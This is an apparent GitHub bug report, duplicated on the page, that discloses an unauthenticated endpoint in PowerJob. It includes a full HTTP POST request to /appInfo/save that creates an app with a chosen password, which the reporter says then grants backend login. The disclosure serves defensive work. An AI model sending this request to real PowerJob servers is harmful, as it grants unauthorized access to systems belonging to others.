Describe the bug
A clear and concise description of what the bug is.
Hello teams,I want to report an unauthorized access vulnerability
There is an unauthorized access on the /appInfo/save interface.
Just send this data packet:
POST /appInfo/save HTTP/1.1
Host: test.cn:7700
Content-Length: 36
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{"appName":"test","password":"test"}
It creates a app without requiring any permissions.
The next step is to log in to the backend using the username and password you created.
then To Reproduce
Steps to reproduce the behavior.
Expected behavior
A clear and concise description of what you expected to happen.
Environment
PowerJob Version: [e.g. 3.0.0]
Java Version: [e.g. OpenJDK 8]
OS: [e.g. CentOS 8.1]
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
The text was updated successfully, but these errors were encountered:
Describe the bug
A clear and concise description of what the bug is.
Hello teams,I want to report an unauthorized access vulnerability
There is an unauthorized access on the /appInfo/save interface.
Just send this data packet:
POST /appInfo/save HTTP/1.1
Host: test.cn:7700
Content-Length: 36
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{"appName":"test","password":"test"}
It creates a app without requiring any permissions.
The next step is to log in to the backend using the username and password you created.

then
To Reproduce
Steps to reproduce the behavior.
Expected behavior
A clear and concise description of what you expected to happen.
Environment
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
The text was updated successfully, but these errors were encountered: